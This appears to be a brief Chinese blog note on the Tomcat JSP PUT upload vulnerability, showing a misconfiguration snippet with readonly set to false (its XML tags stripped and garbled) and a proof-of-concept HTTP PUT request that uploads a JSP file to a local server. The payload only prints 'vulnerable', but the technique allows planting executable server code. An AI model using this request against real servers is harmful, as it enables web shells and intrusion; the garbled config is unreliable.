Tomcat JSP文件PUT上传漏洞

Reading time ~1 minute / Page View 0 / Site Visitor 0

0. 概述

<web-app default org.apache.catalina.servlets.DefaultServlet debug 0 readonly false listings false 1 </web-app>

POC:

PUT /cmd/test3.jsp/ HTTP/1.1 Host: 127.0.0.1:8088 Content-Length: 28

<%out.print(“vulnerable”);%>